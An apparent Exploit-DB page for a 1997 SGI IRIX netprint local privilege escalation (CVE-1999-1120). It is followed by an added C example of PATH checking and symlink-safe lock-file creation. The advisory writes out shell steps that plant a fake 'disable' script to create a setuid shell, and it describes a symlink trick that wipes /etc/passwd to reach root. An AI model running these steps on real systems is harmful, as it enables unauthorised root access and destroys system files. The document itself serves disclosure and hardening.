Exploit SGI IRIX 6.4 - 'netprint' Local Privilege Escalation

Exploiter

Hacker
34,644
0
18 Dec 2022
EDB-ID: 19313
EDB verification: Passed
Author: YURI VOLOBUEV
Vulnerability type: LOCAL
Platform: IRIX
CVE: cve-1999-1120
Publication date: 1997-01-04
SGI IRIX 6.4 - 'netprint' Local Privilege Escalation
Code:
source: https://www.securityfocus.com/bid/395/info


A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp.

% cat > /tmp/disable
cp /bin/sh /tmp/lpshell
chmod 4755 /tmp/lpshell
^D
% set path=(. $path)
% netprint -n blah -h blah -p blah 1-234
% /tmp/lpshell

However, one can go further if the BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes its lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd; passwd gets nuked. Then one repeats the netprint trick and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat.
 
Source: www.exploit-db.com
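The two weaknesses in the advisory, a PATH-relative `system("disable")` in a privileged program and a lock file that follows a symlink planted in a directory owned by a less-privileged user, both have standard defensive counterparts. The C below is an added example, not code from the advisory or from IRIX: `path_is_safe` rejects a PATH containing relative or empty entries before a privileged program searches it, and `open_lock_nofollow` creates a lock file in a way that refuses a pre-placed symlink instead of writing through it. Function names are hypothetical.

```c
/* Added example, not code from the advisory or from IRIX. Names are
 * hypothetical. Build: cc -o hardening hardening.c */
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* A privileged program must not search a PATH that contains a relative
 * entry ("." or "bin") or an empty entry (which also means the cwd). */
int path_is_safe(const char *path)
{
    if (path == NULL || *path == '\0')
        return 0;
    for (const char *p = path;;) {
        const char *colon = strchr(p, ':');
        size_t len = colon ? (size_t)(colon - p) : strlen(p);
        if (len == 0 || p[0] != '/')
            return 0;          /* empty or relative entry */
        if (colon == NULL)
            return 1;          /* last entry checked, all absolute */
        p = colon + 1;
    }
}

/* Create a lock file so that a symlink planted at `path` (the lpd.lock
 * trick) is refused instead of followed. O_NOFOLLOW rejects a symlink
 * as the final component; O_CREAT|O_EXCL rejects anything pre-existing.
 * Returns an open fd, or -1 with errno set. */
int open_lock_nofollow(const char *path)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0644);
    if (fd < 0)
        return -1;
    struct stat st;
    /* Verify the object actually opened: a regular file with one link. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_nlink != 1) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    printf("'.:/usr/bin' safe: %d\n", path_is_safe(".:/usr/bin"));       /* 0 */
    printf("'/usr/bin:/bin' safe: %d\n", path_is_safe("/usr/bin:/bin")); /* 1 */
    return 0;
}
```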
